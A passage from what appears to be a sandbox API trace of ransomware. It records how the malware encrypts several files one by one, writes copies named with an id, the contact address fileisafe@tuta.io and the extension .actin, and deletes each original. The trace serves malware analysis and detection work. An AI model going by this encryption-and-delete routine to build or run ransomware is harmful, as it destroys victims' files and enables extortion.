| out: pbBuffer=0x37aff18) returned 1 [0048.057] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0048.057] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=201796) returned 1 [0048.057] CloseHandle (hObject=0x348) returned 1 [0048.057] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml")) returned 0x80 [0048.057] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0048.057] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0048.057] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0048.057] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0048.058] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0048.058] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71dc0) returned 1 [0048.058] CryptSetKeyParam (hKey=0xf71dc0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0048.058] ReadFile (in: hFile=0x348, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x31444, lpOverlapped=0x0) returned 1 [0048.062] CryptEncrypt (in: hKey=0xf71dc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x31450, dwBufLen=0x31450 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x31450) returned 1 [0048.063] WriteFile (in: hFile=0x338, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x31450, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x31450, lpOverlapped=0x0) returned 1 [0048.066] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71b80) returned 1 [0048.066] CryptSetKeyParam (hKey=0xf71b80, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0048.066] CryptEncrypt (in: hKey=0xf71b80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50, dwBufLen=0x50 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50) returned 1 [0048.066] CryptDestroyKey (hKey=0xf71b80) returned 1 [0048.066] WriteFile (in: hFile=0x338, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x102, lpOverlapped=0x0) returned 1 [0048.066] CryptDestroyKey (hKey=0xf71dc0) returned 1 [0048.066] CloseHandle (hObject=0x348) returned 1 [0048.066] CloseHandle (hObject=0x338) returned 1 [0048.071] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml")) returned 1 [0048.073] SetEvent (hEvent=0x2e8) returned 1 [0048.073] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0048.073] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0048.074] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=39042) returned 1 [0048.074] CloseHandle (hObject=0x338) returned 1 [0048.074] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml")) returned 0x80 [0048.074] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\UiInfo.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0048.074] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0048.074] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0048.074] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0048.074] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\UiInfo.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0048.076] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf72140) returned 1 [0048.076] CryptSetKeyParam (hKey=0xf72140, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0048.076] ReadFile (in: hFile=0x338, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x9882, lpOverlapped=0x0) returned 1 [0048.077] CryptEncrypt (in: hKey=0xf72140, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x9890, dwBufLen=0x9890 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x9890) returned 1 [0048.078] WriteFile (in: hFile=0x348, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x9890, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x9890, lpOverlapped=0x0) returned 1 [0048.079] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71dc0) returned 1 [0048.079] CryptSetKeyParam (hKey=0xf71dc0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0048.079] CryptEncrypt (in: hKey=0xf71dc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40, dwBufLen=0x40 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40) returned 1 [0048.079] CryptDestroyKey (hKey=0xf71dc0) returned 1 [0048.079] WriteFile (in: hFile=0x348, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xf2, lpOverlapped=0x0) returned 1 [0048.079] CryptDestroyKey (hKey=0xf72140) returned 1 [0048.079] CloseHandle (hObject=0x338) returned 1 [0048.079] CloseHandle (hObject=0x348) returned 1 [0048.080] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml")) returned 1 [0048.081] SetEvent (hEvent=0x2e8) returned 1 [0048.082] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0048.082] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\DHtmlHeader.html" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0048.082] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=16118) returned 1 [0048.082] CloseHandle (hObject=0x348) returned 1 [0048.082] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\DHtmlHeader.html" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html")) returned 0x80 [0048.082] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\DHtmlHeader.html.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0048.082] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\DHtmlHeader.html" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0048.082] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0048.082] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0048.082] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\DHtmlHeader.html.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0048.082] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71dc0) returned 1 [0048.082] CryptSetKeyParam (hKey=0xf71dc0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0048.083] ReadFile (in: hFile=0x348, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x3ef6, lpOverlapped=0x0) returned 1 [0048.563] CryptEncrypt (in: hKey=0xf71dc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x3f00, dwBufLen=0x3f00 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x3f00) returned 1 [0048.563] WriteFile (in: hFile=0x338, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x3f00, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x3f00, lpOverlapped=0x0) returned 1 [0048.564] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf72100) returned 1 [0048.564] CryptSetKeyParam (hKey=0xf72100, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0048.564] CryptEncrypt (in: hKey=0xf72100, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50, dwBufLen=0x50 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50) returned 1 [0048.564] CryptDestroyKey (hKey=0xf72100) returned 1 [0048.564] WriteFile (in: hFile=0x338, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x102, lpOverlapped=0x0) returned 1 [0048.565] CryptDestroyKey (hKey=0xf71dc0) returned 1 [0048.565] CloseHandle (hObject=0x348) returned 1 [0048.565] CloseHandle (hObject=0x338) returned 1 [0048.565] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\DHtmlHeader.html" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html")) returned 1 [0048.566] SetEvent (hEvent=0x2e8) returned 1 [0048.567] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0048.567] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Print.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0048.568] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=1150) returned 1 [0048.568] CloseHandle (hObject=0x338) returned 1 [0048.568] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Print.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico")) returned 0x80 [0048.568] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Print.ico.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0048.568] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Print.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0048.568] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0048.569] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0048.569] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Print.ico.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0048.569] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71fc0) returned 1 [0048.569] CryptSetKeyParam (hKey=0xf71fc0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0048.569] ReadFile (in: hFile=0x338, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x47e, lpOverlapped=0x0) returned 1 [0048.573] CryptEncrypt (in: hKey=0xf71fc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x480, dwBufLen=0x480 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x480) returned 1 [0048.573] WriteFile (in: hFile=0x348, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x480, lpOverlapped=0x0) returned 1 [0048.574] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71dc0) returned 1 [0048.574] CryptSetKeyParam (hKey=0xf71dc0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0048.574] CryptEncrypt (in: hKey=0xf71dc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40, dwBufLen=0x40 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40) returned 1 [0048.574] CryptDestroyKey (hKey=0xf71dc0) returned 1 [0048.574] WriteFile (in: hFile=0x348, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xf2, lpOverlapped=0x0) returned 1 [0048.574] CryptDestroyKey (hKey=0xf71fc0) returned 1 [0048.574] CloseHandle (hObject=0x338) returned 1 [0048.574] CloseHandle (hObject=0x348) returned 1 [0048.575] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Print.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico")) returned 1 [0048.575] SetEvent (hEvent=0x2e8) returned 1 [0048.576] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0048.576] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0048.576] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=894) returned 1 [0048.576] CloseHandle (hObject=0x348) returned 1 [0048.576] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico")) returned 0x80 [0048.576] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0048.576] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0048.576] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0048.576] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0048.576] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0048.577] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71d40) returned 1 [0048.577] CryptSetKeyParam (hKey=0xf71d40, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0048.577] ReadFile (in: hFile=0x348, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x37e, lpOverlapped=0x0) returned 1 [0048.578] CryptEncrypt (in: hKey=0xf71d40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x380, dwBufLen=0x380 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x380) returned 1 [0048.578] WriteFile (in: hFile=0x338, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x380, lpOverlapped=0x0) returned 1 [0048.579] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71ec0) returned 1 [0048.579] CryptSetKeyParam (hKey=0xf71ec0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0048.579] CryptEncrypt (in: hKey=0xf71ec0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40, dwBufLen=0x40 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40) returned 1 [0048.579] CryptDestroyKey (hKey=0xf71ec0) returned 1 [0048.579] WriteFile (in: hFile=0x338, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xf2, lpOverlapped=0x0) returned 1 [0048.579] CryptDestroyKey (hKey=0xf71d40) returned 1 [0048.579] CloseHandle (hObject=0x348) returned 1 [0048.579] CloseHandle (hObject=0x338) returned 1 [0048.580] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico")) returned 1 [0048.581] SetEvent (hEvent=0x2e8) returned 1 [0048.581] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0048.581] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0048.581] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=894) returned 1 [0048.581] CloseHandle (hObject=0x338) returned 1 [0048.581] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico")) returned 0x80 [0048.581] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0048.581] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0048.581] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0048.581] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0048.581] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0048.582] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf72100) returned 1 [0048.582] CryptSetKeyParam (hKey=0xf72100, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0048.582] ReadFile (in: hFile=0x338, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x37e, lpOverlapped=0x0) returned 1 [0048.583] CryptEncrypt (in: hKey=0xf72100, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x380, dwBufLen=0x380 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x380) returned 1 [0048.583] WriteFile (in: hFile=0x348, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x380, lpOverlapped=0x0) returned 1 [0048.600] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71ec0) returned 1 [0048.600] CryptSetKeyParam (hKey=0xf71ec0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0048.600] CryptEncrypt (in: hKey=0xf71ec0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40, dwBufLen=0x40 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40) returned 1 [0048.600] CryptDestroyKey (hKey=0xf71ec0) returned 1 [0048.600] WriteFile (in: hFile=0x348, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xf2, lpOverlapped=0x0) returned 1 [0048.600] CryptDestroyKey (hKey=0xf72100) returned 1 [0048.600] CloseHandle (hObject=0x338) returned 1 [0048.600] CloseHandle (hObject=0x348) returned 1 [0048.601] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico")) returned 1 [0048.602] SetEvent 